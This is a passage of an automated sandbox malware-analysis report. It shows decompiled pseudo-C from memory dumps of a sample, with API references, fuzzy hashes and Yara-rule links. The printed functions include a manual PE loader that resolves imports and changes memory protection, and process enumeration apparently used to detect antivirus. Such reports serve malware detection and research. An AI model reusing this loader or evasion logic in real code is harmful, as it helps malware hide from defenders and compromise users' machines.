					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x44bd2a4; // 0x8ca5a8
						_t20 = _t68 + 0x44be1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E044B90E9(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x044b37ba
0x044b37bd
0x044b37cd
0x044b37d6
0x044b37da
0x044b38a8
0x044b38ae
0x044b38ae
0x044b37f4
0x044b37f9
0x044b37fd
0x044b3803
0x044b3808
0x044b380f
0x044b381e
0x044b381e
0x044b3822
0x044b3824
0x044b3830
0x044b383b
0x044b3846
0x044b384a
0x044b3854
0x044b3858
0x044b385a
0x044b385f
0x044b3866
0x044b3876
0x044b3876
0x044b385f
0x044b3858
0x044b3878
0x044b387d
0x044b3882
0x044b3882
0x044b3885
0x044b388e
0x044b3893
0x044b3893
0x044b3898
0x044b389d
0x044b389d
0x044b3898
0x044b3822
0x044b389f
0x044b38a5
0x00000000

APIs

Part of subcall function 044B56F9: SysAllocString.OLEAUT32(80000002), ref: 044B5756
Part of subcall function 044B56F9: SysFreeString.OLEAUT32(00000000), ref: 044B57BC

SysFreeString.OLEAUT32(?), ref: 044B3893
SysFreeString.OLEAUT32(044B8CCC), ref: 044B389D

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 66f775a5ee84b51133e0f20c873361a0ec8fddb65fb35e96d54c76a4ada6f968
Instruction ID: 632288f424a6aea7a617a2f8c57580768f060d183fc942790503e399dee2f866
Opcode Fuzzy Hash: 66f775a5ee84b51133e0f20c873361a0ec8fddb65fb35e96d54c76a4ada6f968
Instruction Fuzzy Hash: B5311571900519EFCF11DFA6C888CDBBBBAEBC97447144659F8859B210D231ED51CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3695, Relevance: 3.1, APIs: 2, Instructions: 52
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E044B3695(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t16;
				short _t19;
				void* _t23;
				void* _t25;
				short* _t26;

				_t25 = E044BA5A3(0, _a12);
				if(_t25 == 0) {
					_t23 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E044B48E2(__ecx, _a4, _a8, _t25); // executed
					_t23 = _t16;
					if(_t23 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_push( &_v12);
						_t23 = E044B3D94(8, _a4, 0x80000001, _a8, _t25);
					}
					HeapFree( *0x44bd238, 0, _t25);
				}
				return _t23;
			}

0x044b36a8
0x044b36ac
0x044b3708
0x044b36ae
0x044b36b5
0x044b36bd
0x044b36c0
0x044b36c5
0x044b36c9
0x044b36cf
0x044b36d7
0x044b36d8
0x044b36de
0x044b36f3
0x044b36f3
0x044b36fe
0x044b36fe
0x044b370f

APIs

Part of subcall function 044BA5A3: lstrlen.KERNEL32(?,00000000,044BD330,00000001,044B453C,044BD00C,044BD00C,00000000,00000005,00000000,00000000,?,?,?,044B857A,?), ref: 044BA5AC
Part of subcall function 044BA5A3: mbstowcs.NTDLL ref: 044BA5D3
Part of subcall function 044BA5A3: memset.NTDLL ref: 044BA5E5

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,75145520,00000008,00000014,004F0053,04D8934C), ref: 044B36CF
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,75145520,00000008,00000014,004F0053,04D8934C), ref: 044B36FE

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 74c6c47ace9fefe9f54e331c4cf2e32d560442a6978b2f9aa88f7f4a347c935b
Instruction ID: c86a2fe3c06931253be09a6d1d60030a677b875910933f4f7e50dcb50a538262
Opcode Fuzzy Hash: 74c6c47ace9fefe9f54e331c4cf2e32d560442a6978b2f9aa88f7f4a347c935b
Instruction Fuzzy Hash: 1201B136610209BBEF215FA99C84ECB7BB8EF88714F10442AFA84DA151E671E954C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 044B59CA, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E044B59CA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x44bd2a4; // 0x8ca5a8
				_t4 = _t15 + 0x44be39c; // 0x4d88944
				_t20 = _t4;
				_t6 = _t15 + 0x44be124; // 0x650047
				_t17 = E044B37B4(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E044B2476(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x044b59d4
0x044b59db
0x044b59dc
0x044b59dd
0x044b59de
0x044b59e4
0x044b59e9
0x044b59e9
0x044b59f3
0x044b5a05
0x044b5a0c
0x044b5a3a
0x044b5a0e
0x044b5a10
0x044b5a15
0x044b5a37
0x044b5a17
0x044b5a1a
0x044b5a21
0x044b5a26
0x044b5a28
0x044b5a28
0x044b5a2d
0x044b5a2d
0x044b5a15
0x044b5a41

APIs

Part of subcall function 044B37B4: SysFreeString.OLEAUT32(?), ref: 044B3893

Part of subcall function 044B2476: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,044B4942,004F0053,00000000,?), ref: 044B247F
Part of subcall function 044B2476: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,044B4942,004F0053,00000000,?), ref: 044B24A9
Part of subcall function 044B2476: memset.NTDLL ref: 044B24BD

SysFreeString.OLEAUT32(00000000), ref: 044B5A2D

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 54aa255c6ce34b75b1b4308c75c11734f8caa2c6ee8d30b2d729943805470b97
Instruction ID: 1930c708f7065c6af1c835943549f2c64996043a09f42d89fd30ab7c895ffde2
Opcode Fuzzy Hash: 54aa255c6ce34b75b1b4308c75c11734f8caa2c6ee8d30b2d729943805470b97
Instruction Fuzzy Hash: 80015E31600119BFEF119FA9CC449EABBB9FF48258B008466E945E6161E771E91287E0

Uniqueness

Uniqueness Score: -1.00%

Function 004017EF, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004017EF(void* __eax, intOrPtr _a4) {

				 *0x404150 =  *0x404150 & 0x00000000;
				_push(0);
				_push(0x40414c);
				_push(1);
				_push(_a4);
				 *0x404148 = 0xc; // executed
				L004011E4(); // executed
				return __eax;
			}

0x004017ef
0x004017f6
0x004017f8
0x004017fd
0x004017ff
0x00401803
0x0040180d
0x00401812

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004012AD,00000001,0040414C,00000000), ref: 0040180D

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 5ce50c92f82e76f18d5ffbe14300fdaaffb2aa5feaa3f407048ba3d265e34ac2
Instruction ID: 6cda89cc4900c3421aaa8319438eab7812503a639d132cc1395a4413cd170214
Opcode Fuzzy Hash: 5ce50c92f82e76f18d5ffbe14300fdaaffb2aa5feaa3f407048ba3d265e34ac2
Instruction Fuzzy Hash: 63C04CF4140340A6E624AF809D4EF457A9177E4705F21052AF3103D6E187F91094851D

Uniqueness

Uniqueness Score: -1.00%

Function 044B6D10, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B6D10(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x44bd238, 0, _a4); // executed
				return _t2;
			}

0x044b6d1c
0x044b6d22

APIs

RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dfdc2b3eb33d9b62ee3c823f95cea243b1fc6e820733839969b848110ff9d2f6
Instruction ID: 56bab9a963b16c3b475be9622c70ad9a6cb48398f9e58d16fe708155f7ca9c50
Opcode Fuzzy Hash: dfdc2b3eb33d9b62ee3c823f95cea243b1fc6e820733839969b848110ff9d2f6
Instruction Fuzzy Hash: 2DB01271400100EFFA054B50DD48F05FB21EB50700F018015B2400407083354C20EB56

Uniqueness

Uniqueness Score: -1.00%

Function 00401151, Relevance: 1.3, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00401151(void* __eax) {
				char _v8;
				void* _v12;
				void* _t17;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				intOrPtr* _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E00401C1F( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E00401984( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t28 = E00401D05(_t33, _t37);
						if(_t28 == 0) {
							_t25 = E00401338(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
					E00401628(_t35);
					L8:
					return _t28;
				}
			}

0x00401159
0x00401176
0x0040117d
0x004011dc
0x00000000
0x0040117f
0x0040117f
0x00401189
0x0040118d
0x00401192
0x0040119b
0x0040119f
0x004011a4
0x004011a9
0x004011ad
0x004011b2
0x004011b3
0x004011b7
0x004011bc
0x004011c4
0x004011c4
0x004011bc
0x004011ad
0x0040119f
0x004011c6
0x004011cf
0x004011d3
0x004011dd
0x004011e3
0x004011e3

APIs

Part of subcall function 00401C1F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0040117B,?,?,?), ref: 00401C44
Part of subcall function 00401C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00401C66
Part of subcall function 00401C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00401C7C
Part of subcall function 00401C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00401C92
Part of subcall function 00401C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00401CA8
Part of subcall function 00401C1F: GetProcAddress.KERNEL32(00000000,?), ref: 00401CBE

Part of subcall function 00401984: memcpy.NTDLL(?,?,?,?,?,?,?,?,00401189,?,?,?,?,?), ref: 004019BB
Part of subcall function 00401984: memcpy.NTDLL(?,?,?), ref: 004019F0

Part of subcall function 00401D05: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?), ref: 00401D3B
Part of subcall function 00401D05: lstrlenA.KERNEL32(?), ref: 00401D51
Part of subcall function 00401D05: memset.NTDLL ref: 00401D5B
Part of subcall function 00401D05: GetProcAddress.KERNEL32(?,00000002), ref: 00401DBE
Part of subcall function 00401D05: lstrlenA.KERNEL32(-00000002), ref: 00401DD3
Part of subcall function 00401D05: memset.NTDLL ref: 00401DDD

Part of subcall function 00401338: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?), ref: 00401366
Part of subcall function 00401338: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 004013BE
Part of subcall function 00401338: GetLastError.KERNEL32 ref: 004013C4

GetLastError.KERNEL32(?,?,?,?), ref: 004011BE

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
String ID:
API String ID: 33504255-0
Opcode ID: 594cd0ffdb8769c16c23695974955e5db3fbbac82882e480f707c611c2d512f1
Instruction ID: 7eb8cf8897a63a1309410c0e7e51ea222e3462f19578fb146e95fba2ffabd0cb
Opcode Fuzzy Hash: 594cd0ffdb8769c16c23695974955e5db3fbbac82882e480f707c611c2d512f1
Instruction Fuzzy Hash: 6F11A9726007116BD7216BAA9C85EAB77FC9F58354B00013AFE01F7391EA78ED05C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 044B4509, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E044B4509(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x44bd330;
				E044B3D1E();
				while(1) {
					_t8 = E044B523B(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E044BA5A3(_t14);
					if(_t15 == 0) {
						HeapFree( *0x44bd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E044B3D1E();
					if(_t19 != 0) {
						_t22 =  *0x44bd338; // 0x4d89b60
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x044b4511
0x044b4515
0x044b4516
0x044b4517
0x044b451c
0x044b4521
0x044b4528
0x044b452f
0x00000000
0x00000000
0x044b4531
0x044b4536
0x044b4537
0x044b453e
0x044b4558
0x00000000
0x044b4540
0x044b4540
0x044b4542
0x044b4545
0x044b4549
0x00000000
0x00000000
0x044b454b
0x044b4549
0x044b4560
0x044b4560
0x044b4562
0x044b4569
0x044b456b
0x044b4571
0x044b4578
0x044b4588
0x044b4580
0x044b4583
0x044b4583
0x044b458b
0x044b458b
0x044b4594
0x044b4594
0x044b455e
0x00000000

APIs

Part of subcall function 044B3D1E: GetProcAddress.KERNEL32(36776F57,044B4521), ref: 044B3D39

Part of subcall function 044B523B: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 044B5266
Part of subcall function 044B523B: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 044B5288
Part of subcall function 044B523B: memset.NTDLL ref: 044B52A2
Part of subcall function 044B523B: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 044B52E0
Part of subcall function 044B523B: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 044B52F4
Part of subcall function 044B523B: FindCloseChangeNotification.KERNELBASE(00000000), ref: 044B530B
Part of subcall function 044B523B: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 044B5317
Part of subcall function 044B523B: lstrcat.KERNEL32(?,642E2A5C), ref: 044B5358
Part of subcall function 044B523B: FindFirstFileA.KERNELBASE(?,?), ref: 044B536E

Part of subcall function 044BA5A3: lstrlen.KERNEL32(?,00000000,044BD330,00000001,044B453C,044BD00C,044BD00C,00000000,00000005,00000000,00000000,?,?,?,044B857A,?), ref: 044BA5AC
Part of subcall function 044BA5A3: mbstowcs.NTDLL ref: 044BA5D3
Part of subcall function 044BA5A3: memset.NTDLL ref: 044BA5E5

HeapFree.KERNEL32(00000000,044BD00C,044BD00C,044BD00C,00000000,00000005,00000000,00000000,?,?,?,044B857A,?,044BD00C,?,?), ref: 044B4558

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: 565af51bf2fc549b4853d3cb2366336af6cf9348ddb9d92e41390c4cf4cd34cc
Instruction ID: dbf31a8f6cf93e96d5934fef056e1b0c0581f5aaeaf402f2caa52a525fa02b3a
Opcode Fuzzy Hash: 565af51bf2fc549b4853d3cb2366336af6cf9348ddb9d92e41390c4cf4cd34cc
Instruction Fuzzy Hash: 4301D275600614ABFF105FAACD80AEAB79CEB41278F50403BAAC4C6141DA64ED8252F0

Uniqueness

Uniqueness Score: -1.00%

Function 044B46B8, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B46B8(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				void* _t15;
				void* _t21;
				signed int _t23;
				void* _t26;

				if(_a4 != 0) {
					_t15 = E044B59CA(_a4, _a8, _a12, __edi); // executed
					_t26 = _t15;
				} else {
					_t26 = E044B424B(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t26 == 0) {
						_t23 = _a8 >> 1;
						if(_t23 == 0) {
							_t26 = 2;
							HeapFree( *0x44bd238, 0, _a12);
						} else {
							_t21 = _a12;
							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
							 *__edi = _t21;
						}
					}
				}
				return _t26;
			}

0x044b46c0
0x044b4717
0x044b471c
0x044b46c2
0x044b46dc
0x044b46e0
0x044b46e5
0x044b46e7
0x044b46f9
0x044b4705
0x044b46e9
0x044b46e9
0x044b46ee
0x044b46f3
0x044b46f3
0x044b46e7
0x044b46e0
0x044b4722

APIs

HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,044B6ABC,?,004F0053,04D89358,00000000,?), ref: 044B4705

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e74a691a94c4c0dfa92fb3d8cef4a3087b8bb1c4a2f20880958de783b2372dde
Instruction ID: 18249c0acbc8065732b4ba06e916a4bd3c07d6ce339a7e9688b24d5285dc56f5
Opcode Fuzzy Hash: e74a691a94c4c0dfa92fb3d8cef4a3087b8bb1c4a2f20880958de783b2372dde
Instruction Fuzzy Hash: 6E016D32100659BBDF259F94CC41FEA7B65EF04364F04801AFE599A262D731A930DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B3B9B, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E044B3B9B(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x044b3b9b
0x044b3ba8
0x044b3ba9
0x044b3baa
0x044b3bb1
0x044b3bdf
0x044b3be0
0x044b3be3
0x044b3be9
0x00000000
0x00000000
0x044b3bc8
0x044b3bd2
0x044b3bd9
0x00000000
0x044b3bca
0x044b3bcd
0x044b3bed
0x044b3bcf
0x044b3bcf
0x00000000
0x044b3bcf
0x044b3bcd
0x044b3bf4
0x044b3bfa
0x044b3bfa
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 044B3BE3

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 551b14f17c7acaf091dfc1d2ebc9aa5736aaeef3a2f00ad33f15c32c353c0654
Instruction ID: db4c3637451dd08e4505ea8091b07ee98ae5ff58e999ff9e1d734b660583bebe
Opcode Fuzzy Hash: 551b14f17c7acaf091dfc1d2ebc9aa5736aaeef3a2f00ad33f15c32c353c0654
Instruction Fuzzy Hash: 8CF01971D05118EFDF10DF99C588AEEB7B8EF04204F1084AAE90267245E3B46B44DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B8779, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044B8779(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E044BA4CA(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E044B45B3(_a4);
				}
				return _t13;
			}

0x044b8785
0x044b878a
0x044b878e
0x044b8795
0x044b87a0
0x044b87a4
0x044b87a4
0x044b87ad

APIs

Part of subcall function 044BA4CA: memcpy.NTDLL(00000000,00000090,?,?,?,00000008), ref: 044BA500
Part of subcall function 044BA4CA: memset.NTDLL ref: 044BA575
Part of subcall function 044BA4CA: memset.NTDLL ref: 044BA589

memcpy.NTDLL(?,?,00000000,?,?,?,?,?,044B5C08,?,?,044B6223,00000002,?,?,?), ref: 044B8795

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: cd736b5b122ae7b26c4d9f2ee90f3773760ba8359180082cd5877326d73c2e8e
Instruction ID: f6134ea1ad2333a7cccfdd34e268cb75dd00fe4675427676692059e06fba2462
Opcode Fuzzy Hash: cd736b5b122ae7b26c4d9f2ee90f3773760ba8359180082cd5877326d73c2e8e
Instruction Fuzzy Hash: 49E08636400118B6DF122A95DC00EFB7F5CCF51694F044026FE4855201D631E51097F1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 044B5946, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E044B5946() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x44bd2a4; // 0x8ca5a8
						_t2 = _t9 + 0x44bee28; // 0x73617661
						_push( &_v264);
						if( *0x44bd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x044b5951
0x044b595b
0x044b595f
0x044b5969
0x044b599a
0x044b5970
0x044b5975
0x044b5982
0x044b598b
0x044b59a2
0x044b598d
0x044b5995
0x00000000
0x044b5995
0x044b59a3
0x044b59a4
0x00000000
0x044b59a4
0x00000000
0x044b599e
0x044b59aa
0x044b59af

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 044B5956
Process32First.KERNEL32(00000000,?), ref: 044B5969
Process32Next.KERNEL32(00000000,?), ref: 044B5995
CloseHandle.KERNEL32(00000000), ref: 044B59A4

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: bf5f64b4d0c1be32710e39463b5b80c53f1cdd747197b060b492a024209ead10
Instruction ID: 6d7479a7ac7e64665477488cf6aa1bc6545b4b196c8da34c2347b9159817eb3d
Opcode Fuzzy Hash: bf5f64b4d0c1be32710e39463b5b80c53f1cdd747197b060b492a024209ead10
Instruction Fuzzy Hash: 3CF09672600125BBFF21AB669C49DEBF7ACDBC5328F000067E989D2101E634E94786F5

Uniqueness

Uniqueness Score: -1.00%

Function 004010D8, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010D8() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
